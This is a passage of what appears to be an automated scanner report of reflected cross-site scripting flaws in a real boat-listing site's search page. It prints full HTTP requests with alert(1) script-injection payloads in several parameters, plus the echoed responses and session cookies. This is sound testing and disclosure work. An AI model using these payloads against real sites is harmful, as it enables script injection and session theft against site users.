Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2CUsed%2C2004; latestSavedSearches=0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.20.10.1296155952; s_pers=%20s_nr%3D1296156212531%7C1298748212531%3B%20s_lv%3D1296156212533%7C1390764212533%3B%20s_lv_s%3DFirst%2520Visit%7C1296158012533%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/advancedSearch.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromYear%2525253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:49 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 56047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

   <title>Advance
...[SNIP]...

...[SNIP]...

3.334. http://www.yachtworld.com/core/listing/advancedSearch.jsp [man parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The value of the man request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d00e4"><script>alert(1)</script>a6a0961b6e5 was submitted in the man parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulatord00e4"><script>alert(1)</script>a6a0961b6e5&slim=quick&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2CUsed%2C2004; latestSavedSearches=0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.20.10.1296155952; s_pers=%20s_nr%3D1296156212531%7C1298748212531%3B%20s_lv%3D1296156212533%7C1390764212533%3B%20s_lv_s%3DFirst%2520Visit%7C1296158012533%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/advancedSearch.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromYear%2525253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:49 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 56357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>Advance
...[SNIP]...
<input size=15 type="text" name="man" value="regulatord00e4"><script>alert(1)</script>a6a0961b6e5">
...[SNIP]...

3.335. http://www.yachtworld.com/core/listing/advancedSearch.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee845"style%3d"x%3aexpression(alert(1))"7e5e8c5eb1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee845"style="x:expression(alert(1))"7e5e8c5eb1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&ee845"style%3d"x%3aexpression(alert(1))"7e5e8c5eb1d=1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2CUsed%2C2004; latestSavedSearches=0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.20.10.1296155952; s_pers=%20s_nr%3D1296156212531%7C1298748212531%3B%20s_lv%3D1296156212533%7C1390764212533%3B%20s_lv_s%3DFirst%2520Visit%7C1296158012533%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/advancedSearch.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromYear%2525253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:30 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 56334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>Advance
...[SNIP]...
/core/listing/cache/searchResults.jsp?fromYear=2004&searchtype=homepage&Ntk=boatsEN&sm=3&toLength=32&cit=true&currencyid=100&luom=126&fromPrice=0&fromLength=24&man=regulator&slim=quick&N=2286&is=false&ee845"style="x:expression(alert(1))"7e5e8c5eb1d&pricderange=Select+Price+Range" >
...[SNIP]...

3.336. http://www.yachtworld.com/core/listing/advancedSearch.jsp [sm parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The value of the sm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 592fb'%3balert(1)//8b92116101b was submitted in the sm parameter. This input was echoed as 592fb';alert(1)//8b92116101b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3592fb'%3balert(1)//8b92116101b&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2CUsed%2C2004; latestSavedSearches=0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.20.10.1296155952; s_pers=%20s_nr%3D1296156212531%7C1298748212531%3B%20s_lv%3D1296156212533%7C1390764212533%3B%20s_lv_s%3DFirst%2520Visit%7C1296158012533%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/advancedSearch.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromYear%2525253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:32 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 36458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>Advance
...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "3592fb';alert(1)//8b92116101b"<br>
...[SNIP]...

3.337. http://www.yachtworld.com/core/listing/advancedSearch.jsp [toLength parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The value of the toLength request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4359f"><script>alert(1)</script>ece5f04902e was submitted in the toLength parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=324359f"><script>alert(1)</script>ece5f04902e&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2CUsed%2C2004; 